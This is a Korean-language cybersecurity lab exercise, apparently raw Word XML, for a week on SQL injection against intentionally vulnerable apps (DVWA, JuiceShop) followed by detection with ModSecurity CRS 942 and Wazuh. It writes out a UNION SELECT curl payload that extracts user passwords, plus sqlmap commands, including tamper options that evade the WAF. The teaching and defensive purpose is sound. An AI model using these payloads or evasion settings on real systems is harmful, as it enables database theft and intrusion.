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W4] SQL Injection(sqlmap·WAF 우회) vs SQLi 탐지·차단 분석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공격기법 4주차 — SQL Injection(OWASP A03). 공격자는 4종 SQLi 페이로드와 sqlmap 자동화/tamper 로</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>데이터 추출을 시도하고 WAF(ModSecurity CRS 942)를 우회하려 한다. 방어자는 SQLi 시도를 탐지하고,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>어떤 페이로드가 차단(403)되고 어떤 것이 통과(200)했는지 분석한다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>▸ 모드: solo(공격자→SQLi 탐지 1인) / duel(Red 가 상대에 SQLi, Blue 가 본인 WAF 로 탐지/차단 분석). 대상=solo 본인 / duel 상대.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r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SQLi 페이로드 4종 + sqlmap 자동화</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>DVWA(8080)/JuiceShop 에 error/union/boolean/time-based SQLi 를 시도하고 sqlmap 으로 자동화한다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>curl -s "http://192.168.0.161:8080/vulnerabilities/sqli/?id=1' UNION SELECT user,password FROM users-- -&amp;Submit=Submit" --cookie "security=low; PHPSESSID=test"</w:t>
        <w:br/>
        <w:t>sqlmap -u "http://192.168.0.161:8080/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="security=low; PHPSESSID=test" --batch --dbs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>📌 채점: 외부 명령 미수집 → 대상 ModSecurity(CRS 942) SQLi 탐지. ✅ 합격: 대상 WAF audit 에 SQLi 탐지 다수.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ModSec(CRS 942) 우회 시도 (tamper)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>sqlmap tamper(space2comment, between 등)나 인코딩으로 CRS 942 룰을 우회하려 시도한다. 우회에</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>성공하면 페이로드가 403 이 아닌 200 으로 통과한다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sqlmap -u "...sqli/?id=1&amp;Submit=Submit" --cookie="security=low; PHPSESSID=test" --batch \</w:t>
        <w:br/>
        <w:t xml:space="preserve">       --tamper=space2comment,between --technique=BU</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>📌 채점: 외부 명령 미수집 → 대상 ModSec audit 에 우회 시도/통과 흔적(차단 회피 페이로드 요청).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>✅ 합격: 대상 WAF audit 에 우회 시도(다양 변형 SQLi)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WAF 차단 모드 확인</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>SQLi 를 실제 차단(403)하려면 ModSecurity 가 On 이어야 한다. SecRuleEngine On 을 확인한다.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>✅ 합격: 본인 web 의 ModSecurity 가 SecRuleEngine On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SQLi 탐지·차단 분석 (CRS 942)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">본인 WAF audit 에서 RED 의 SQLi 를 분석한다 — 어떤 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>942 룰 id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 가 어떤 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>페이로드</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 에 걸렸고,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>차단(403) vs 통과(200)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 결과가 무엇인지 구체 식별한다. 우회된 페이로드가 있으면 식별한다.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>✅ 합격: SQLi 탐지가 있고 룰 id/페이로드/응답코드를 구체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13점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SIEM 으로 SQLi 사건 종합</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>SQLi 시도·우회 시도가 SIEM(Wazuh)으로 모여 한 사건으로 보이는지 확인하고, 공격자의 우회</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>진화를 시간순으로 요약한다.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>✅ 합격: 본인 SIEM 에 SQLi/웹공격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